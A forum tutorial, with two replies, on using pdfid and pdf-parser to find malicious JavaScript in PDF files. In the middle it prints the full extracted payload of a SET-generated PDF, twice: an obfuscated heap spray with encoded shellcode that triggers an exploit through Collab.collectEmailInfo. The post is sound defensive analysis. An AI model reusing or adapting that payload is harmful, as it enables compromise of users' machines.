Author Topic: Analyzing Malicious Malware Embedded in Adobe PDF Files  (Read 3961 times)

Offline Alkapone

  • NULL
  • Posts: 2
  • Cookies: 4
Analyzing Malicious Malware Embedded in Adobe PDF Files
« on: September 30, 2013, 10:54:30 pm »
This tutorial is going to teach you how to find malicious data within PDF readers.

I find it pretty cool because instead of writing

strings #filename
gdb
objects
etc etc

you don't need to know all this, because there is a tool that simplifies pulling information out of the PDF reader, almost like "grep".


What you will need:

Python installed, Windows or Linux

Code:
pdf-parser
pdfid

Now I'm going to write this by myself without having to look up information, so if I mess up I'll fix it.
I'm just writing this out to see how much of this I remembered.


When you open up a PDF file: PDF incorporated a JavaScript engine into the PDF reader, which allows executing JavaScript code.

Malicious hackers will insert these JavaScript codes into the objects within a PDF file and modify strings and whatnot.

So instead of having

/Javascript

a hacker will turn it into something like /jAVAsCRIPT

etc etc

An example output:

Code:
root@bt:/pentest/forensics/pdfid# python pdfid.py --disarm testfile.pdf
/Open#41#63tion -> /oPEN#61#43TION
/J#61va#53#63r#69#70#74 -> /j#41VA#73#43R#49#50#54
/#4a#53 -> /#6a#73
PDFiD 0.0.11 testfile.pdf
 PDF Header: %PDF-1.5
 obj                    6
 endobj                 6
 stream                 1
 endstream              1
 xref                   1
 trailer                1
 startxref              1
 /Page                  1(1)
 /Encrypt               0
 /ObjStm                0
 /JS                    1(1)
 /JavaScript            1(1)
 /AA                    0
 /OpenAction            1(1)
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /Colors > 2^24         0

We can see that there is embedded code within
/JS
/JavaScript
/OpenAction

Notice at the top how OpenAction is changed to something else?

It's to obfuscate antiviruses.

Our goal is to pull the JavaScript code out of the (I call them tables, or objects, however you say it).

First command to execute:

Disarm the PDF files

Code:
python pdfid.py --disarm testfile.pdf

What this does is change the case of the words to make them something else, so when you open the .pdf file it is safe and nothing will execute.

The (1) indicates that there is an obfuscation inside that table.

So now you have basic information:

what's obfuscated.

But now you need to go in deeper; there is a piece of software called

pdf-parser.py

pdf-parser is nothing more than a grep-like utility on Linux, just that it's made for pulling contents out of the PDF file.

So now we need to locate the embedded malicious JavaScript code.

pdf-parser has a grep utility where you can search for certain stuff within the PDF file,

so execute this:

Code:
python pdf-parser.py --search javascript filename.pdf

What this will do is search the contents of the PDF file for anything related to JavaScript.

So this is what we get back:

Code:
obj 5 0
 Type: /Action
 Referencing: 6 0 R
 [(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]

 <<
   /Type /Action
   /S /JavaScript
   /JS 6 0 R
 >>

Things to note here:

1. The object is 5
2. It uses JavaScript
3. As you can see the JavaScript is encoded, but --search still found it, which is awesome
4. /Type /Action

So now we know that JavaScript is included in object 5 and is getting referenced through object 6 as well.

So what do we do now?

We pretty much just jump to the next location.

Since 5 is referencing 6, and 5 was referenced in the search for JavaScript, we know that the next
one is going to be holding the JavaScript code itself.

Example:

Code:
python pdf-parser.py --object 5 --filter testfile.pdf
obj 5 0
 Type: /Action
 Referencing: 6 0 R
 [(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]

 <<
   /Type /Action
   /S /JavaScript
   /JS 6 0 R
 >>

Notice: /JS 6 0 R

So now we know JS is being held in table 6.

So now we will filter the jump and paste the JavaScript code.

Code:
python pdf-parser.py --object 6 --filter testfile.pdf

Code:
obj 6 0
 Type:
 Referencing:
 Contains stream
 [(2, '<<'), (2, '/Length'), (1, ' '), (3, '6532'), (2, '/#46ilt#65r'), (2, '['), (2, '/#46#6c#61teDeco#64e'), (2, '/A#53C#49#49He#78Decod#65'), (2, ']'), (2, '>>'), (1, '\r\n')]

 <<
   /Length 6532
   /Filter [
   /FlateDecode /ASCIIHexDecode]
 >>

And now we finally see the JavaScript code:

Code:
>>

 '\n\t\tvar ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub71
4%ub6d5%ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");\n\t\tvar oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";\n\t\tfor (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");\n\t\tNFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;\n\t\tHyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");\n\t\tnjvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;\n\t\tCEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length\n\t\twhile 
(HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;\n\t\tFycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\tmozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\twhile(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;\n\t\tSScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();\n\t\tfor (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;\n\t\tvar rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");\n\t\twhile(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;\n\t\tthis.collabStore = 
Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});\n\t\t\t\t\t'

Obviously this is all crowded together, but if we want to organize it to show the code a lot better, we will type

Code:
python pdf-parser.py --object 6 --filter --raw testfile.pdf

The filter and raw will output it in readable format:

Code:
        var ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub71
4%ub6d5%ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");
        var oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";
        for (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");
        NFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;
        HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");
        njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;
        CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length
        while (HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;
        FycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
        mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
        while(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;
        SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();
        for (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;
        var rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");
        while(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;
        this.collabStore = Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});

Which is now readable.

But since this software uses the
Quote
/FlateDecode /ASCIIHexDecode]

you have to find a way to decrypt it.

I found a site that helps in analyzing those types of encryptions, which can be located at

http://wepawet.cs.ucsb.edu.com

I was using SET (Social Engineer Toolkit) to generate a malicious .pdf file, and then I analyzed it with these tools.

Note: Not all malicious PDF files will incorporate that as an encryption method, and you may just get lucky. Sometimes there will be and sometimes there won't; there are like 4 other methods for encryption on this.

The encrypted JavaScript code you see up there was done by the SET encryption thing.

Anyways, I hope you learned something from this.

And if I wrote this tutorial shitty, I'm sorry.
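As an added example (not code from the post above, and not the pdfid/pdf-parser source by Didier Stevens), here is a small Python script that does on a constructed sample what the two tools do in the walkthrough: it resolves the #xx name escapes, counts the script keywords pdfid-style with the escaped ("obfuscated") count in parentheses, and decodes a stream through its /Filter chain the way pdf-parser --filter does. Note that /FlateDecode and /ASCIIHexDecode are not encryption but standard PDF stream filters (zlib compression and hex encoding), which is why they can be undone offline with the standard library. The sample document, its object numbers and the harmless app.alert payload are constructed for the example; the obfuscated spellings are copied from the pdfid and pdf-parser output shown above.

```python
"""pdfid/pdf-parser-style keyword scan and stream decoding (added example)."""
import binascii
import re
import zlib

# Subset of the keywords pdfid reports. PDF names are case-sensitive, so a
# case-swapped spelling such as /jAVAsCRIPT deliberately does NOT count.
KEYWORDS = ["/JS", "/JavaScript", "/OpenAction", "/AA", "/Launch",
            "/RichMedia", "/AcroForm"]

# A PDF name token: '/' followed by regular characters (no whitespace/delimiters)
NAME_RE = re.compile(rb"/[^\s/<>\[\]{}()%]+")
ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
# A stream: its dictionary, then the 'stream' keyword and a line break
STREAM_RE = re.compile(rb"<<([^>]*)>>\s*stream\r?\n")


def decode_name(raw: bytes) -> bytes:
    """Resolve #xx hex escapes: b'/J#61va#53#63r#69#70#74' -> b'/JavaScript'."""
    return ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def scan_keywords(pdf: bytes) -> dict:
    """pdfid-style count per keyword: (total, how many were written with escapes)."""
    counts = {k: [0, 0] for k in KEYWORDS}
    for m in NAME_RE.finditer(pdf):
        raw = m.group(0)
        key = decode_name(raw).decode("latin-1")
        if key in counts:
            counts[key][0] += 1
            if b"#" in raw:          # escaped spelling: the "(1)" column in pdfid
                counts[key][1] += 1
    return {k: tuple(v) for k, v in counts.items()}


def report(counts: dict) -> str:
    """Render counts the way pdfid prints them, e.g. ' /JS            1(1)'."""
    return "\n".join(" %-14s %d%s" % (k, t, "(%d)" % o if o else "")
                     for k, (t, o) in counts.items())


def apply_filters(data: bytes, filters: list) -> bytes:
    """Decode a stream body by applying its /Filter chain in the listed order."""
    for f in filters:
        if f == b"/FlateDecode":
            data = zlib.decompress(data)
        elif f == b"/ASCIIHexDecode":
            hexpart = data.split(b">", 1)[0]            # '>' marks end of data
            data = binascii.unhexlify(re.sub(rb"\s", b"", hexpart))
        else:
            raise ValueError("unsupported filter %r" % f)
    return data


def extract_streams(pdf: bytes) -> list:
    """Find every stream, read /Length and /Filter from its (de-escaped)
    dictionary and return the decoded bodies, like pdf-parser --filter."""
    bodies = []
    for m in STREAM_RE.finditer(pdf):
        dict_src = NAME_RE.sub(lambda n: decode_name(n.group(0)), m.group(1))
        length = int(re.search(rb"/Length\s+(\d+)", dict_src).group(1))
        fm = re.search(rb"/Filter\s*(\[[^\]]*\]|/[^\s/<>\[\]{}()%]+)", dict_src)
        filters = NAME_RE.findall(fm.group(1)) if fm else []
        body = pdf[m.end():m.end() + length]
        bodies.append(apply_filters(body, filters))
    return bodies


# Constructed sample payload (harmless). It is hex-encoded and then deflated,
# so a reader decodes it with /FlateDecode first and /ASCIIHexDecode second.
SAMPLE_JS = b'app.alert("constructed sample, not a real payload");'


def build_sample_pdf() -> bytes:
    """Constructed mini document reusing the obfuscated names from the post."""
    encoded = zlib.compress(binascii.hexlify(SAMPLE_JS) + b">")
    header = (b"%PDF-1.5\n"
              b"1 0 obj\n<< /Type /Catalog /Open#41#63tion 5 0 R >>\nendobj\n"
              b"5 0 obj\n<< /#54#79pe /#41#63#74i#6fn /S /J#61va#53#63r#69#70#74"
              b" /#4a#53 6 0 R >>\nendobj\n"
              b"6 0 obj\n<< /Length " + str(len(encoded)).encode()
              + b" /#46ilt#65r [ /#46#6c#61teDeco#64e /A#53C#49#49He#78Decod#65 ] >>\n"
              b"stream\n")
    return header + encoded + b"\nendstream\nendobj\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    pdf = build_sample_pdf()
    print(report(scan_keywords(pdf)))
    for body in extract_streams(pdf):
        print("decoded stream:", body.decode("latin-1"))
```

The keyword match is done on the de-escaped name but stays case-sensitive, which is exactly the property pdfid --disarm relies on: escapes hide a name from a naive grep but not from the reader, while a case swap hides it from the reader.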

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #1 on: October 01, 2013, 06:28:36 am »
You could do something about the text formatting, maybe use bold for the titles etc.
Apart from that I think it's a nice share, thanks for contributing :)
+1
« Last Edit: October 01, 2013, 06:29:04 am by proxx »

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • *
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« Reply #2 on: October 01, 2013, 08:27:28 am »
That's a good tutorial, but I have to agree with proxx. I don't like the numerous empty lines, that looks like you wanted to stretch it or something.
+1 for you

Offline hydroxypropylcellulose

  • /dev/null
